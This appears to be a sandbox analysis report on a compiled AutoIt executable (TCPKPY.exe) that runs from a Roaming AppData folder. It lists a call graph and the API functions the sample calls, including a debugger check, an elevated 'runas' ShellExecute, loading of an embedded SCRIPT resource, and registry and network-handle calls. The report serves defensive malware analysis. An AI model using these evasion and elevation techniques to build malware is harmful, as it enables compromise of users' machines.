4 library calls 103872->103947 103873->103839 103873->103841 103873->103842 103873->103844 103873->103845 103873->103847 103873->103849 103873->103850 103873->103851 103873->103853 103873->103857 103873->103859 103873->103863 103873->103866 103873->103867 103873->103870 103873->103872 103925 26798d 103873->103925 103930 20f6d0 255 API calls 2 library calls 103873->103930 103931 211620 59 API calls Mailbox 103873->103931 103942 25ee52 82 API calls 2 library calls 103873->103942 103943 25ef9d 90 API calls Mailbox 103873->103943 103944 24b020 48 API calls 103873->103944 103945 25e713 255 API calls Mailbox 103873->103945 103875->103054 103876->103054 103877->103054 103879 20fa40 255 API calls 103878->103879 103892 20dd0f _memmove 103879->103892 103880 278dbe 103916 24d520 86 API calls 4 library calls 103880->103916 103882 278ddc 103882->103882 103883 20dd70 103883->103803 103884 20e12b Mailbox 103886 22010a 48 API calls 103884->103886 103885 20e051 103888 20e066 103885->103888 103889 278daf 103885->103889 103899 20decb _memmove 103886->103899 103887 22010a 48 API calls 103887->103892 103891 22010a 48 API calls 103888->103891 103915 25d1da 50 API calls 103889->103915 103902 20df64 103891->103902 103892->103880 103892->103883 103892->103884 103892->103887 103893 20deb7 103892->103893 103905 20df29 103892->103905 103893->103884 103895 20dec4 103893->103895 103894 22010a 48 API calls 103896 20def6 103894->103896 103897 22010a 48 API calls 103895->103897 103896->103905 103910 214320 255 API calls 103896->103910 103897->103899 103898 278d9e 103914 24d520 86 API calls 4 library calls 103898->103914 103899->103894 103899->103896 103899->103905 103902->103803 103904 278d76 103913 24d520 86 API calls 4 library calls 103904->103913 103905->103885 103905->103898 103905->103902 103905->103904 103907 278d51 103905->103907 103911 205322 255 API calls 103905->103911 103912 24d520 86 API calls 4 library calls 103907->103912 103909->103805 103910->103905 103911->103905 103912->103902 103913->103902 103914->103902 103915->103880 103916->103882 103918 203269 103917->103918 103919 20327f 103918->103919 103922 25592d InternetCloseHandle InternetCloseHandle WaitForSingleObject 103918->103922 103919->103808 103921->103811 103922->103918 103923->103822 103924->103822 103952 2019ee 103925->103952 103929 2679a4 103929->103873 103930->103873 103931->103873 103933 20d8ac 103932->103933 103940 20d8db Mailbox 103932->103940 103934 20d8ff 103933->103934 103936 20d8b2 Mailbox 103933->103936 103935 20c935 48 API calls 103934->103935 103935->103940 103937 20d8c7 103936->103937 103938 274e9b 103936->103938 103939 274e72 VariantClear 103937->103939 103937->103940 103938->103940 104093 23a599 InterlockedDecrement 103938->104093 103939->103940 103940->103851 103942->103873 103943->103873 103944->103873 103945->103873 103946->103872 103947->103866 103948->103849 103949->103844 103950->103853 103951->103860 103953 20d89e 50 API calls 103952->103953 103954 201a08 103953->103954 103955 201a12 103954->103955 103956 27db7d 103954->103956 103978 2084a6 103955->103978 103958 207e53 48 API calls 103956->103958 103960 27db8d 103958->103960 103959 201a1f 103961 20c935 48 API calls 103959->103961 103960->103960 103962 201a2d 103961->103962 103963 201dce 103962->103963 103964 201de4 Mailbox 103963->103964 103965 27db26 103964->103965 103966 201dfd 103964->103966 103967 27db2b IsWindow 103965->103967 103968 201e46 103966->103968 103971 2084a6 81 API calls 103966->103971 103969 201e51 103967->103969 103970 27db3f 103967->103970 103968->103969 103973 27db65 IsWindow 103968->103973 103969->103929 104054 20200a 48 API calls 103970->104054 103974 201e17 103971->103974 103973->103969 103973->103970 104000 201f04 103974->104000 103975 27db4b 103977 20197e 48 API calls 103975->103977 103977->103969 103979 2084be 103978->103979 103993 2084ba 103978->103993 103980 275592 __i64tow 103979->103980 103981 2084d2 103979->103981 103982 275494 103979->103982 103990 2084ea __itow Mailbox _wcscpy 103979->103990 103998 22234b 80 API calls 3 library calls 103981->103998 103983 27549d 103982->103983 103984 27557a 103982->103984 103989 2754bc 103983->103989 103983->103990 103999 22234b 80 API calls 3 library calls 103984->103999 103987 22010a 48 API calls 103988 2084f4 103987->103988 103992 20caee 48 API calls 103988->103992 103988->103993 103991 22010a 48 API calls 103989->103991 103990->103987 103995 2754d9 103991->103995 103992->103993 103993->103959 103994 22010a 48 API calls 103996 2754ff 103994->103996 103995->103994 103996->103993 103997 20caee 48 API calls 103996->103997 103997->103993 103998->103990 103999->103990 104001 201f1a Mailbox 104000->104001 104002 20c935 48 API calls 104001->104002 104003 201f3e 104002->104003 104004 20c935 48 API calls 104003->104004 104005 201f49 104004->104005 104006 207e53 48 API calls 104005->104006 104007 201f59 104006->104007 104008 20d3d2 48 API calls 104007->104008 104009 201f87 104008->104009 104010 20d3d2 48 API calls 104009->104010 104011 201f90 104010->104011 104012 20d3d2 48 API calls 104011->104012 104013 201f99 104012->104013 104014 272569 104013->104014 104015 201fac 104013->104015 104056 23e4ea 60 API calls 3 library calls 104014->104056 104017 272583 104015->104017 104019 201fbe GetForegroundWindow 104015->104019 104018 20a4f6 48 API calls 104017->104018 104021 272597 104018->104021 104055 20200a 48 API calls 104019->104055 104023 272899 104021->104023 104026 20a4f6 48 API calls 104021->104026 104022 201fcc 104024 20197e 48 API calls 104022->104024 104025 2728ab 104023->104025 104028 20c935 48 API calls 104023->104028 104027 201fe1 104024->104027 104029 2728d6 104025->104029 104030 20b8a7 48 API calls 104025->104030 104053 2725ad 104026->104053 104043 201fe4 Mailbox 104027->104043 104028->104025 104031 2728f1 104029->104031 104037 20b8a7 48 API calls 104029->104037 104034 2728ce CharUpperBuffW 104030->104034 104032 2728fc GetDesktopWindow EnumChildWindows 104031->104032 104033 27290b EnumWindows 104031->104033 104036 272911 104032->104036 104033->104036 104062 23e69d 104033->104062 104034->104029 104060 23e44e 48 API calls Mailbox 104036->104060 104038 2728e9 CharUpperBuffW 104037->104038 104038->104031 104040 272922 Mailbox 104041 272940 104040->104041 104061 20200a 48 API calls 104040->104061 104043->103968 104044 27281d 104047 27282a IsWindow 104044->104047 104045 272842 GetForegroundWindow 104046 27283c 104045->104046 104046->104043 104046->104045 104059 20200a 48 API calls 104046->104059 104047->104043 104047->104046 104049 205cf6 47 API calls 104049->104053 104050 20c935 48 API calls 104050->104053 104052 222241 48 API calls 104052->104053 104053->104023 104053->104043 104053->104044 104053->104046 104053->104049 104053->104050 104053->104052 104057 23d68d 49 API calls 104053->104057 104058 205be9 61 API calls 104053->104058 104054->103975 104055->104022 104056->104017 104057->104053 104058->104053 104059->104046 104060->104040 104061->104041 104063 23e6a9 104062->104063 104064 23e6d4 GetClassNameW 104063->104064 104065 23e6f7 _wcscmp 104063->104065 104064->104065 104066 23e70d GetWindowTextW 104065->104066 104080 23e7b3 _wcscmp 104065->104080 104068 23e726 __NMSG_WRITE 104066->104068 104075 23e73d _wcscmp __wopenfile _wcsstr 104066->104075 104067 23e7c8 GetWindowTextW 104070 20caee 48 API calls 104067->104070 104071 23e730 CharUpperBuffW 104068->104071 104069 23e849 GetClassNameW 104073 20caee 48 API calls 104069->104073 104074 23e7e9 104070->104074 104071->104075 104072 23e8a6 104077 23e8b7 GetWindowRect 104072->104077 104083 23e8cc 104072->104083 104076 23e86a 104073->104076 104090 207e36 48 API calls 104074->104090 104079 23e791 GetClassNameW 104075->104079 104075->104080 104091 207e36 48 API calls 104076->104091 104077->104083 104079->104080 104080->104067 104088 23e833 _wcscmp 104080->104088 104084 23e954 104083->104084 104085 20197e 48 API calls 104083->104085 104085->104084 104086 23e7f6 Mailbox 104086->104088 104089 23e811 GetClassNameW 104086->104089 104087 23e877 Mailbox 104087->104072 104092 23e970 SendMessageTimeoutW EnumChildWindows 104087->104092 104088->104069 104088->104087 104089->104088 104090->104086 104091->104087 104092->104072 104093->103940 104095 221eee __lseeki64 104094->104095 104096 228984 __lock 47 API calls 104095->104096 104101 221ef5 _doexit 104096->104101 104099 22200b __lseeki64 104099->102731 104107 221ffc 104101->104107 104102 221ff3 104103 221d65 _fast_error_exit 3 API calls 104102->104103 104104 221ffc 104103->104104 104106 222009 104104->104106 104112 228ae8 LeaveCriticalSection 104104->104112 104106->102731 104108 222002 104107->104108 104109 221fdc 104107->104109 104113 228ae8 LeaveCriticalSection 104108->104113 104109->104099 104111 228ae8 LeaveCriticalSection 104109->104111 104111->104102 104112->104106 104113->104109 104114 2029c2 104115 2029cb 104114->104115 104116 202a48 104115->104116 104117 2029e9 104115->104117 104158 202a46 104115->104158 104121 272307 104116->104121 104122 202a4e 104116->104122 104118 2029f6 104117->104118 104119 202aac PostQuitMessage 104117->104119 104124 202a01 104118->104124 104125 27238f 104118->104125 104126 202a39 104119->104126 104120 202a2b DefWindowProcW 104120->104126 104123 20322e 16 API calls 104121->104123 104127 202a53 104122->104127 104128 202a76 SetTimer RegisterWindowMessageW 104122->104128 104129 27232e 104123->104129 104130 202ab6 104124->104130 104131 202a09 104124->104131 104166 2457fb 60 API calls _memset 104125->104166 104134 202a5a KillTimer 104127->104134 104135 2722aa 104127->104135 104128->104126 104132 202a9f CreatePopupMenu 104128->104132 104136 21ec33 255 API calls 104129->104136 104161 201e58 53 API calls _memset 104130->104161 104137 272374 104131->104137 104138 202a14 104131->104138 104132->104126 104159 202b94 Shell_NotifyIconW _memset 104134->104159 104141 2722e3 MoveWindow 104135->104141 104142 2722af 104135->104142 104145 202a1f 104136->104145 104137->104120 104165 23b31f 48 API calls 104137->104165 104138->104145 104146 27235f 104138->104146 104139 2723a1 104139->104120 104139->104126 104141->104126 104148 2722b3 104142->104148 104149 2722d2 SetFocus 104142->104149 104144 202a6d 104160 202ac7 DeleteObject DestroyWindow Mailbox 104144->104160 104145->104120 104162 202b94 Shell_NotifyIconW _memset 104145->104162 104164 245fdb 70 API calls _memset 104146->104164 104147 202ac5 104147->104126 104148->104145 104152 2722bc 104148->104152 104149->104126 104154 20322e 16 API calls 104152->104154 104154->104126 104156 272353 104163 203598 67 API calls _memset 104156->104163 104158->104120 104159->104144 104160->104126 104161->104147 104162->104156 104163->104158 104164->104147 104165->104158 104166->104139 104167 271f5f 104170 2045a7 104167->104170 104171 275935 DestroyWindow 104170->104171 104172 2045e6 mciSendStringW 104170->104172 104175 275941 104171->104175 104173 204604 104172->104173 104174 2047a6 104172->104174 104173->104175 104176 204610 104173->104176 104174->104173 104177 2047b5 UnregisterHotKey 104174->104177 104178 275946 104175->104178 104179 27595a FindClose 104175->104179 104181 275976 104176->104181 104182 20462b 104176->104182 104177->104174 104200 2050ec CloseHandle 104178->104200 104179->104181 104184 2759ac 104181->104184 104185 27599b FreeLibrary 104181->104185 104182->104184 104189 204639 104182->104189 104183 275950 104183->104181 104186 2759c0 VirtualFree 104184->104186 104190 2046a6 104184->104190 104185->104181 104186->104184 104187 204695 CoUninitialize 104187->104190 104189->104187 104198 2032c9 CloseHandle 104190->104198 104191 2046ae Mailbox 104199 204208 47 API calls Mailbox 104191->104199 104193 2046c9 Mailbox 104194 202de4 47 API calls 104193->104194 104195 2046df Mailbox 104194->104195 104196 203282 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 104195->104196 104197 2047a1 104196->104197 104198->104191 104200->104183 104201 271eed 104206 21e975 104201->104206 104203 271f01 104222 221b2a 52 API calls __cinit 104203->104222 104205 271f0b 104207 22010a 48 API calls 104206->104207 104208 21ea27 GetModuleFileNameW 104207->104208 104223 22297d 104208->104223 104210 21ea5b _wcsncat 104226 222bff 104210->104226 104213 22010a 48 API calls 104214 21ea94 _wcscpy 104213->104214 104215 20d3d2 48 API calls 104214->104215 104216 21eacf 104215->104216 104229 21eb05 104216->104229 104218 21eae0 Mailbox 104218->104203 104219 20a4f6 48 API calls 104221 21eada _wcscat __NMSG_WRITE _wcsncpy 104219->104221 104220 22010a 48 API calls 104220->104221 104221->104218 104221->104219 104221->104220 104222->104205 104243 2229c7 104223->104243 104269 22aab9 104226->104269 104281 20c4cd 104229->104281 104231 21eb14 RegOpenKeyExW 104232 274b17 RegQueryValueExW 104231->104232 104233 21eb35 104231->104233 104234 274b91 RegCloseKey 104232->104234 104235 274b30 104232->104235 104233->104221 104236 22010a 48 API calls 104235->104236 104237 274b49 104236->104237 104238 204bce 48 API calls 104237->104238 104239 274b53 RegQueryValueExW 104238->104239 104240 274b6f 104239->104240 104241 274b86 104239->104241 104242 207e53 48 API calls 104240->104242 104241->104234 104242->104241 104244 2229e2 104243->104244 104247 2229d6 104243->104247 104267 22889e 47 API calls __getptd_noexit 104244->104267 104246 222b9a 104256 2229c2 104246->104256 104268 227aa0 8 API calls ___wstrgtold12_l 104246->104268 104247->104244 104255 222a55 104247->104255 104262 22a9fb 47 API calls ___wstrgtold12_l 104247->104262 104250 222b21 104250->104244 104252 222b31 104250->104252 104250->104256 104251 222ae0 104251->104244 104253 222afc 104251->104253 104264 22a9fb 47 API calls ___wstrgtold12_l 104251->104264 104266 22a9fb 47 API calls ___wstrgtold12_l 104252->104266 104253->104244 104253->104256 104258 222b12 104253->104258 104255->104244 104261 222ac2 104255->104261 104263 22a9fb 47 API calls ___wstrgtold12_l 104255->104263 104256->104210 104265 22a9fb 47 API calls ___wstrgtold12_l 104258->104265 104261->104250 104261->104251 104262->104255 104263->104261 104264->104253 104265->104256 104266->104256 104267->104246 104268->104256 104270 22abc6 104269->104270 104271 22aaca 104269->104271 104279 22889e 47 API calls __getptd_noexit 104270->104279 104271->104270 104277 22aad5 104271->104277 104273 22abbb 104280 227aa0 8 API calls ___wstrgtold12_l 104273->104280 104276 21ea8a 104276->104213 104277->104276 104278 22889e 47 API calls __getptd_noexit 104277->104278 104278->104273 104279->104273 104280->104276 104282 20c4e7 104281->104282 104284 20c4da 104281->104284 104283 22010a 48 API calls 104282->104283 104283->104284 104284->104231 104285 271e8b 104290 21e44f 104285->104290 104289 271e9a 104291 22010a 48 API calls 104290->104291 104292 21e457 104291->104292 104293 21e46b 104292->104293 104298 21e74b 104292->104298 104297 221b2a 52 API calls __cinit 104293->104297 104297->104289 104299 21e754 104298->104299 104300 21e463 104298->104300 104330 221b2a 52 API calls __cinit 104299->104330 104302 21e47b 104300->104302 104303 20d3d2 48 API calls 104302->104303 104304 21e492 GetVersionExW 104303->104304 104305 207e53 48 API calls 104304->104305 104306 21e4d5 104305->104306 104331 21e5f8 104306->104331 104312 2729f9 104313 21e576 104316 21e5ec GetSystemInfo 104313->104316 104317 21e59e 104313->104317 104314 21e55f GetCurrentProcess 104348 21e70e LoadLibraryA GetProcAddress 104314->104348 104319 21e5c9 104316->104319 104342 21e694 104317->104342 104321 21e5d7 FreeLibrary 104319->104321 104322 21e5dc 104319->104322 104321->104322 104322->104293 104324 21e5e4 GetSystemInfo 104326 21e5be 104324->104326 104325 21e5b4 104345 21e437 104325->104345 104326->104319 104329 21e5c4 FreeLibrary 104326->104329 104329->104319 104330->104300 104332 21e601 104331->104332 104333 20a2fb 48 API calls 104332->104333 104334 21e4dd 104333->104334 104335 21e617 104334->104335 104336 21e625 104335->104336 104337 20a2fb 48 API calls 104336->104337 104338 21e4e9 104337->104338 104338->104312 104339 21e6d1 104338->104339 104349 21e6e3 104339->104349 104353 21e6a6 104342->104353 104346 21e694 2 API calls 104345->104346 104347 21e43f GetNativeSystemInfo 104346->104347 104347->104326 104348->104313 104350 21e55b 104349->104350 104351 21e6ec LoadLibraryA 104349->104351 104350->104313 104350->104314 104351->104350 104352 21e6fd GetProcAddress 104351->104352 104352->104350 104354 21e5ac 104353->104354 104355 21e6af LoadLibraryA 104353->104355 104354->104324 104354->104325 104355->104354 104356 21e6c0 GetProcAddress 104355->104356 104356->104354 104357 271edb 104362 20131c 104357->104362 104359 271ee1 104395 221b2a 52 API calls __cinit 104359->104395 104361 271eeb 104363 20133e 104362->104363 104396 201624 104363->104396 104368 20d3d2 48 API calls 104369 20137e 104368->104369 104370 20d3d2 48 API calls 104369->104370 104371 201388 104370->104371 104372 20d3d2 48 API calls 104371->104372 104373 201392 104372->104373 104374 20d3d2 48 API calls 104373->104374 104375 2013d8 104374->104375 104376 20d3d2 48 API calls 104375->104376 104377 2014bb 104376->104377 104404 201673 104377->104404 104381 2014eb 104382 20d3d2 48 API calls 104381->104382 104383 2014f5 104382->104383 104433 20175e 104383->104433 104385 201540 104386 201550 GetStdHandle 104385->104386 104387 2015ab 104386->104387 104388 2758da 104386->104388 104390 2015b1 CoInitialize 104387->104390 104388->104387 104389 2758e3 104388->104389 104440 249bd1 53 API calls 104389->104440 104390->104359 104392 2758ea 104441 24a2f6 CreateThread 104392->104441 104394 2758f6 CloseHandle 104394->104390 104395->104361 104442 2017e0 104396->104442 104399 207e53 48 API calls 104400 201344 104399->104400 104401 2016db 104400->104401 104456 201867 6 API calls 104401->104456 104403 201374 104403->104368 104405 20d3d2 48 API calls 104404->104405 104406 201683 104405->104406 104407 20d3d2 48 API calls 104406->104407 104408 20168b 104407->104408 104457 207d70 104408->104457 104411 207d70 48 API calls 104412 20169b 104411->104412 104413 20d3d2 48 API calls 104412->104413 104414 2016a6 104413->104414 104415 22010a 48 API calls 104414->104415 104416 2014c5 104415->104416 104417 2016f2 104416->104417 104418 201700 104417->104418 104419 20d3d2 48 API calls 104418->104419 104420 20170b 104419->104420 104421 20d3d2 48 API calls 104420->104421 104422 201716 104421->104422 104423 20d3d2 48 API calls 104422->104423 104424 201721 104423->104424 104425 20d3d2 48 API calls 104424->104425 104426 20172c 104425->104426 104427 207d70 48 API calls 104426->104427 104428 201737 104427->104428 104429 22010a 48 API calls 104428->104429 104430 20173e 104429->104430 104431 2724a6 104430->104431 104432 201747 RegisterWindowMessageW 104430->104432 104432->104381 104434 2767dd 104433->104434 104435 20176e 104433->104435 104462 24d231 50 API calls 104434->104462 104436 22010a 48 API calls 104435->104436 104438 201776 104436->104438 104438->104385 104439 2767e8 104440->104392 104441->104394 104463 24a2dc 54 API calls 104441->104463 104449 2017fc 104442->104449 104445 2017fc 48 API calls 104446 2017f0 104445->104446 104447 20d3d2 48 API calls 104446->104447 104448 20165b 104447->104448 104448->104399 104450 20d3d2 48 API calls 104449->104450 104451 201807 104450->104451 104452 20d3d2 48 API calls 104451->104452 104453 20180f 104452->104453 104454 20d3d2 48 API calls 104453->104454 104455 2017e8 104454->104455 104455->104445 104456->104403 104458 20d3d2 48 API calls 104457->104458 104459 207d79 104458->104459 104460 20d3d2 48 API calls 104459->104460 104461 201693 104460->104461 104461->104411 104462->104439 104464 271eca 104469 21be17 104464->104469 104468 271ed9 104470 20d3d2 48 API calls 104469->104470 104471 21be85 104470->104471 104477 21c929 104471->104477 104473 21bf22 104474 21bf3e 104473->104474 104480 21c8b7 48 API calls _memmove 104473->104480 104476 221b2a 52 API calls __cinit 104474->104476 104476->104468 104481 21c955 104477->104481 104480->104473 104482 21c962 104481->104482 104483 21c948 104481->104483 104482->104483 104484 21c969 RegOpenKeyExW 104482->104484 104483->104473 104484->104483 104485 21c983 RegQueryValueExW 104484->104485 104486 21c9a4 104485->104486 104487 21c9b9 RegCloseKey 104485->104487 104486->104487 104487->104483

                                                                                                                Executed Functions

                                                                                                                Function 0020374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145windowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0020376D
                                                                                                                  • Part of subcall function 00204257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,00000104,?,00000000,00000001,00000000), ref: 0020428C
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?), ref: 0020377F
                                                                                                                • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,00000104,?,002C1120,C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,002C1124,?,?), ref: 002037EE
                                                                                                                  • Part of subcall function 002034F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0020352A
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00203860
                                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,002B2934,00000010), ref: 002721C5
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?), ref: 002721FD
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00272232
                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0029DAA4), ref: 00272290
                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 00272297
                                                                                                                  • Part of subcall function 002030A5: GetSysColorBrush.USER32(0000000F), ref: 002030B0
                                                                                                                  • Part of subcall function 002030A5: LoadCursorW.USER32(00000000,00007F00), ref: 002030BF
                                                                                                                  • Part of subcall function 002030A5: LoadIconW.USER32(00000063), ref: 002030D5
                                                                                                                  • Part of subcall function 002030A5: LoadIconW.USER32(000000A4), ref: 002030E7
                                                                                                                  • Part of subcall function 002030A5: LoadIconW.USER32(000000A2), ref: 002030F9
                                                                                                                  • Part of subcall function 002030A5: RegisterClassExW.USER32(?), ref: 00203167
                                                                                                                  • Part of subcall function 00202E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00202ECB
                                                                                                                  • Part of subcall function 00202E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00202EEC
                                                                                                                  • Part of subcall function 00202E9D: ShowWindow.USER32(00000000), ref: 00202F00
                                                                                                                  • Part of subcall function 00202E9D: ShowWindow.USER32(00000000), ref: 00202F09
                                                                                                                  • Part of subcall function 00203598: _memset.LIBCMT ref: 002035BE
                                                                                                                  • Part of subcall function 00203598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00203667
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$",
                                                                                                                • API String ID: 4253510256-2040468189
                                                                                                                • Opcode ID: 2ecfe6c2f6d2cf0b0fdddf3c6e8bca304052045285fed3cd1fb8eaaf3b478da3
                                                                                                                • Instruction ID: d2d834d62845a9e1f980d56d7aadd88ad3bcd540d2807a1484dab75467d5f6f4
                                                                                                                • Opcode Fuzzy Hash: 2ecfe6c2f6d2cf0b0fdddf3c6e8bca304052045285fed3cd1fb8eaaf3b478da3
                                                                                                                • Instruction Fuzzy Hash: 6A512A74664345FADF10EBA0AC4BFAD3B6C9B06700F04419AFA49921D3D6B04A79CF62
                                                                                                                Function 0021E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1147 21e47b-21e50a call 20d3d2 GetVersionExW call 207e53 call 21e5f8 call 21e617 1156 21e510-21e511 1147->1156 1157 2729f9-2729fc 1147->1157 1160 21e513-21e51e 1156->1160 1161 21e54d-21e55d call 21e6d1 1156->1161 1158 272a15-272a19 1157->1158 1159 2729fe 1157->1159 1163 272a04-272a0d 1158->1163 1164 272a1b-272a24 1158->1164 1162 272a01 1159->1162 1165 21e524-21e526 1160->1165 1166 27297f-272985 1160->1166 1174 21e582-21e59c 1161->1174 1175 21e55f-21e57c GetCurrentProcess call 21e70e 1161->1175 1162->1163 1163->1158 1164->1162 1171 272a26-272a29 1164->1171 1172 27299a-2729a6 1165->1172 1173 21e52c-21e52f 1165->1173 1169 272987-27298a 1166->1169 1170 27298f-272995 1166->1170 1169->1161 1170->1161 1171->1163 1176 2729b0-2729b6 1172->1176 1177 2729a8-2729ab 1172->1177 1178 2729c6-2729c9 1173->1178 1179 21e535-21e544 1173->1179 1181 21e5ec-21e5f6 GetSystemInfo 1174->1181 1182 21e59e-21e5b2 call 21e694 1174->1182 1175->1174 1198 21e57e 1175->1198 1176->1161 1177->1161 1178->1161 1183 2729cf-2729e4 1178->1183 1184 21e54a 1179->1184 1185 2729bb-2729c1 1179->1185 1187 21e5c9-21e5d5 1181->1187 1195 21e5e4-21e5ea GetSystemInfo 1182->1195 1196 21e5b4-21e5bc call 21e437 GetNativeSystemInfo 1182->1196 1189 2729e6-2729e9 1183->1189 1190 2729ee-2729f4 1183->1190 1184->1161 1185->1161 1191 21e5d7-21e5da FreeLibrary 1187->1191 1192 21e5dc-21e5e1 1187->1192 1189->1161 1190->1161 1191->1192 1197 21e5be-21e5c2 1195->1197 1196->1197 1197->1187 1201 21e5c4-21e5c7 FreeLibrary 1197->1201 1198->1174 1201->1187
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0021E4A7
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,0029DC28,?,?), ref: 0021E567
                                                                                                                • GetNativeSystemInfo.KERNEL32(?,0029DC28,?,?), ref: 0021E5BC
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0021E5C7
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0021E5DA
                                                                                                                • GetSystemInfo.KERNEL32(?,0029DC28,?,?), ref: 0021E5E4
                                                                                                                • GetSystemInfo.KERNEL32(?,0029DC28,?,?), ref: 0021E5F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2717633055-0
                                                                                                                • Opcode ID: e840183899be8e56eaf3e752e24675144fd7025ac22b325f7966b897c46407b1
                                                                                                                • Instruction ID: befcb52a74a630becc4366bbff645d3ec2a25ad742e3463b584469c2074ba8de
                                                                                                                • Opcode Fuzzy Hash: e840183899be8e56eaf3e752e24675144fd7025ac22b325f7966b897c46407b1
                                                                                                                • Instruction Fuzzy Hash: 3F61D1B182A284DBCF15CF6898C01E97FA56F3A304F6A85D8DC489B247E634C958CB65
                                                                                                                Function 002031F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1219 2031f2-20320a CreateStreamOnHGlobal 1220 20322a-20322d 1219->1220 1221 20320c-203223 FindResourceExW 1219->1221 1222 2757d3-2757e2 LoadResource 1221->1222 1223 203229 1221->1223 1222->1223 1224 2757e8-2757f6 SizeofResource 1222->1224 1223->1220 1224->1223 1225 2757fc-275807 LockResource 1224->1225 1225->1223 1226 27580d-27582b 1225->1226 1226->1223
                                                                                                                APIs
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00203202
                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00203219
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 002757D7
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 002757EC
                                                                                                                • LockResource.KERNEL32(?), ref: 002757FF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
